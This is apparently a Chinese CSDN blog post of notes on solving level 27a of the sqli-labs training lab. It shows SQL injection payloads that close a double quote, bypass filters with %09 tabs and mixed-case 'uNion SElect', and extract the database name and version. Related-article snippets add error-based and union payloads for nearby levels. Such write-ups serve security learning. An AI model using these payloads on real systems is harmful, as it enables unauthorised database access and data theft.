sqllab第二十七A关通关笔记

最新推荐文章于 2024-08-30 18:40:43 发布
最新推荐文章于 2024-08-30 18:40:43 发布
阅读量309 收藏
点赞数 3
文章标签: 笔记 sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136781904
版权
本文探讨了如何利用双引号闭合绕过UnionSelect方法进行SQL注入,展示了payload的不同构造方式,如获取数据库名和版本信息,以及为何某些构造能成功回显部分结果。
摘要由CSDN通过智能技术生成

知识点:

  • 双引号闭合
  • union select 大小写绕过
    • Union Select
  • 这里不能进行错误注入,无回显

经过测试发现这是一个双引号闭合

构造payload:id=1"%09and%091="1

页面成功回显

构造payload:id=0"%09uNion%09SElect%091,2,3%09"1

页面成功回显除了输入内容

获取数据库名和版本信息

构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1

成功获取了数据库名和版本信息

10

I_WORM
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqllab第二十七通关笔记
I_WORM的博客
03-17 429
构造payload:id=1'%09and%09extractvalue(1,concat(0x7e,database(),0x7e))='1。构造payload:id=1'%09and%09exp(710)='1。经过不断的测试发现空格和+被过滤了,发现%09可以代替空格绕过检测。构造payload:id=1'%09and%091='1。页面给出了提示,联合查询键字被过滤了,直接使用错误注入。页面成功回显出了相信息,说明绕过成功。构造payload:id=1''成功获取到了数据库名;
sqllab第35-45通关笔记
I_WORM的博客
03-18 663
10
sqllab第二十八通关笔记(附带28a)
I_WORM的博客
03-17 320
构造payload:id=0%27)union%09all%09select%091,database(),3%09=(%271。重新构造payload:id=0%27)union%09all%09select%091,2,3%09and1=(%271。构造payload:id=-1%27)union%09all%09select%091,2,3%09and1=(%271。页面成功回显了,但是内容不是输入信息,应该是他把-1进行绝对值处理了,导致显示了id=1的内容。好,尝试进行错误注入。
sqllab第七通关笔记
I_WORM的博客
03-13 678
如果是简单的单引号绕过的话,注释符应该把后面的那个引号进行注释了,那么and后面的引号应该会因为引号不闭合进行报错,但是这里正常显示了,这里就搞不懂了;设置payload2为字符组合类型(brute forcer),设置最小长度和最大长度都为1,因为他会把指定区间的长度都进行枚举,这里只需要进行字符爆破,所以设定长度为1,这样就是枚举每个字符和数字了。开始爆破,得出结果后进行过滤;因为错误和正确的输出长度是一样的,所以没办法利用长度进行辨别,点击上面的过滤条件,将正确的输出内容复制到过滤条件中,点击应用。
DVWA 共12通关笔记
09-12
【DVWA 共12通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
松鼠大战1第A通关录像.mp4
09-10
松鼠大战1第A通关录像
愤怒的小鸟水煮蛋1-15通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15通关录像
愤怒的小鸟水煮蛋1-3通关录像.mp4
05-02
愤怒的小鸟水煮蛋1-3通关录像
算法通关村第一-链表青铜挑战笔记
10-28
源代码
12306项目学习笔记(框架篇Base)
qq_74851649的博客
08-30 891
首先学习的是基础框架提供了一种静态方式来访问Spring容器中的Bean,适用于某些特定场景,如工具类和框架集成。在12306项目中由于我们引入了RocketMQ消息队列,这些库的对象通常不是Spring管理的,无法直接使用@Autowired注入,所以需要类提供一种静态方式来访问Spring容器中的Bean。比如在我们的TicketServiceImpl中的bean对象就是用以下方法获取的。
算法的学习笔记—连续子数组的最大和
业精于勤,荒于嬉
08-29 3407
通过上述的动态规划方法,我们能够有效地解决连续子数组的最大和问题。该方法简单易懂,并且具有较高的效率,适合在大多数情况下使用。😁热门专栏推荐想学习vue的可以看看这个java基础合集数据库合集redis合集nginx合集linux合集手写机制微服务组件spring_尘觉springMVCmybits🤔欢迎大家加入我的社区尘觉社区文章到这里就结束了,如果有什么疑问的地方请指出,诸佬们一起来评论区一起讨论😁如果帮助到您不妨3连支持一下,创造不易您们的支持是我的动力🤞。
#单片机基础 笔记
weixin_58298518的博客
08-29 1396
SPI+中断 时钟系统 ADC+PWM DMA+DHT11
Java基础(6)- Java代码笔记3
最新发布
weixin_47062560的博客
08-30 2268
数据类型[][] 数组名 = new 数据类型[m][n]数据类型 数组名[][] = new 数据类型[m][n]数据类型[] 数组名[] = new 数据类型[m][n]m:代表二维数组长度n:代表二维数组中每个一维数组的长度。
谷粒商城实战笔记-282~283-商城业务-订单服务-提交订单的问题
epitomizelu的专栏
08-29 1122
Services Panel 是 IntelliJ IDEA 提供的一个功能模块,旨在帮助开发者更好地管理和监控应用程序中的服务组件。它位于 IDE 的右侧面板中,可以方便地访问一系列与项目相的服务和工具。
android - 笔记
tianyu的专栏 - Linux site:blog.csdn.net/wishfly
08-29 60
1 安装[教程]VMware安装Android虚拟机+联网_哔哩哔哩_bilibili
#C++ 笔记
weixin_58298518的博客
08-29 1101
异常处理 智能指针 其他
深度学习入门笔记
本人hexo博客:www.boluoboluobo.top
08-29 816
个人感觉其实神经网络其实就是一个万能的拟合器,训练神经网络的过程,就是让计算机自己从大量的数据中寻找一条公式。这些数据有输入,输出结果,就是中间的函数映射是未知的,寻找的就是这些未知的映射。我们创建的神经网络,就是假定了函数的很多参数,通过损失函数,丈量与实际真实结果之间的距离。目标就是缩小之间的距离,而这个过程就相当于寻求一个函数的最低点,最低点的特征是导数为0,因此反向传播求导是获取了探寻最低点的方向,学习率就是前进的步长。
C++学习笔记----5、重用之设计(三)---- 设计可用的接口(3)
weixin_71738303的博客
08-30 876
通用接口可以应用于多种任务。如果你将应该通用的接口做成了只能为一个应用所用,那么对于其他目的则不可用。以下是几个要记住的指导思想。
upload-labs19通关
07-28
5. 完成以上步骤后,即可成功通关第19。 以上是通关upload-labs第19的方法。根据引用\[2\]中的内容,这些方法在实战中可能会有所不同,但基本原理是相似的。希望这些方法能对你的学习有所帮助。 #### 引用[....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值